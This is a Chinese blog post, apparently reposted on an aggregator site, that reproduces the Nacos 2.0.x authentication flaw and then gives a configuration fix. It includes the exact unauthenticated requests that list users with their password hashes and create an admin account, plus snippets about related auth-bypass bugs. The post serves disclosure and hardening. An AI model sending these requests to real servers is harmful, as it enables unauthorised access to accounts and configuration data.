Nacos身份认证漏洞

这篇具有很好参考价值的文章主要介绍了Nacos身份认证漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

背景

公司Nacos版本有用的2.0.1和2.0.3的都复现了身份认证的漏洞,无需认证身份就可以查看用户列表以及注册新用户,并且注册上来的新用户可以查看所有public命名空间下的配置资源!

漏洞复现

1、查看用户列表
  • URL:http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=1
  • 方法类型:GET
  • 返回结果:
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$gZoOI701ByEP8LatzrVyneAf4zoYAyLoCrrlegCeYkFbqgtaoBIQ."}]}

如图示:
Nacos身份认证漏洞

2、用户注册

无需任何用户凭证即可新建用户,例如这里我新建admin/123456用户。

  • URL:http://ip:8848/nacos/v1/auth/users?username=admin&password=123456
  • 方法类型:POST
  • 返回结果:
{
    "code": 200,
    "message": null,
    "data": "create user ok!"
}

postman测试截图:
Nacos身份认证漏洞
可以看到提示创建用户成功。使用账号登录可以看到所有public命名空间下的配置资源,这里登录截图就不贴出来了,大家可以自己去测试。

整改措施

通过检索,发现修改nacos的application.properties的配置可以解决这个问题,需要修改的配置内容如下:

#修改配置文件application.properties,修改以下三项:
① 将nacos.core.auth.enabled=false改为true
② 将nacos.core.auth.enable.userAgentAuthWhite=true 改为false
③ nacos.core.auth.server.identity.key=自定义的值
  nacos.core.auth.server.identity.value=自定义的值
#重启nacos:
systemctl restart nacos

经过实践,第三点自定义的值可以自己定义,和我们需要注册上nacos的服务配置没有关联。修改完上面配置后,再次尝试上述两个漏洞得到下列返回:
Nacos身份认证漏洞
可以看到获取用户列表接口被禁止了。
Nacos身份认证漏洞
可以看到新建用户接口也被禁止了。使用admin/123456登录系统:
Nacos身份认证漏洞
此时admin用户已经没有权限查看public命名空间的配置资源了。至此nacos此次的认证漏洞算是告一段落了。

奇怪的是漏洞问题最早是2020年12月份发现的,网上博客对于这个漏洞的集中爆发讨论在21年,这2022年都快过完了没想到团队才发现这个漏洞!

道友可以在博客下方留言互相探讨学习或者关注公众号fairy with you了解更多,欢迎来撩!

Nacos身份认证漏洞文章来源地址https://www.toymoban.com/news/detail-409210.html

注:本博客仅用于交流学习,不用于任何商业用途,欢迎思维碰撞。

到了这里,关于Nacos身份认证漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • NACOS身份认证绕过

    一、漏洞描述 Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。攻击者通过添加Nacos-Server的User-Agent头部将可绕过(nacos.core.auth.enabled=true)鉴权认证,从而进行API操作。 二、漏洞利用 访问 http://xxxxx/nacos/v1/auth/users?username=testpassword=test ,并使用burpsuite进行抓包,将方法

    2024年02月16日
    浏览(46)
  • Smartbi 身份认证绕过漏洞

    因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。 在未登录的情况下访问接口  /smartbi/vision/RMIServlet ​ 我们可以比较明显的看到对应的处理类  CheckIsLoggedFilter ​ smartbi.fre

    2024年02月16日
    浏览(42)
  • 【漏洞复现-通达OA】通达OA share身份认证绕过漏洞

    通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器

    2024年02月19日
    浏览(43)
  • CVE-2023-27524 Apache Superset 身份认证绕过漏洞

    Apache Superset是一个开源的数据可视化和数据探测平台,它基于Python构建,使用了一些类似于Django和Flask的Python web框架。提供了一个用户友好的界面,可以轻松地创建和共享仪表板、查询和可视化数据,也可以集成到其他应用程序中。由于用户在默认安装过程中,未对SECRET_KE

    2024年02月10日
    浏览(66)
  • Apache Superset 身份认证绕过漏洞(CVE-2023-27524)

    Apache Superset是一个开源的数据可视化和数据探测平台,它基于Python构建,使用了一些类似于Django和Flask的Python web框架。提供了一个用户友好的界面,可以轻松地创建和共享仪表板、查询和可视化数据,也可以集成到其他应用程序中。由于用户在默认安装过程中,未对SECRET_KE

    2024年02月09日
    浏览(56)
  • 【严重】Grafana Azure AD环境身份认证绕过漏洞

     Grafana 是一个跨平台、开源的数据可视化网络应用平台。Azure AD 是由微软提供的一种云身份验证和访问管理服务。 在 Azure AD 中,多个用户可以拥有相同的电子邮件地址。攻击者可以创建一个与目标 Grafana 账户相同的电子邮件地址的恶意帐户,并且在 Azure AD 中配置支持多租户

    2024年02月17日
    浏览(45)
  • 【burpsuite安全练兵场-服务端2】身份认证漏洞-16个实验(全)

       博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。 擅长:

    2024年02月03日
    浏览(42)
  • 统一身份认证,构建数字时代的安全壁垒——统一身份认证介绍、原理和实现方法

    随着数字化时代的来临,个人和机构在互联网上的活动越来越频繁,对于身份认证的需求也愈发迫切。为了有效应对身份欺诈、数据泄露等问题,统一身份认证(Unified Identity Authentication)应运而生。 在本文博主将介绍统一身份认证的概念、原理以及其具体的实现方案。 统一

    2024年02月03日
    浏览(45)
  • 身份认证——802.1x认证和MAC认证讲解

    目录 802.1x基础 EAP(Extensible Authentication Protocol)可扩展认证协议 EAPoL(EAP over LAN)局域网可扩展认证协议 802.1x体系架构 受控端口的受控方式 802.1x认证 802.1x认证触发方式 客户端退出认证 802.1x认证方式 MAC认证 802.1x认证又称为EAPOE(Extensible Authentication Protocol Over Ethernet)认证

    2024年02月03日
    浏览(43)
  • 常见的身份认证技术

    (1)   口令认证技术(用户名/密码) 这是最简单也是最传统的身份认证方法,通过口令来验证用户的合法有效性。 通过用户名  ID  和用户密码  PW  来认证用户。 只要能够正确验证密码,系统就判定操作者是合法用户。 口令认证主要适用于小型封闭型系统。 存在的问题

    2024年02月06日
    浏览(54)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包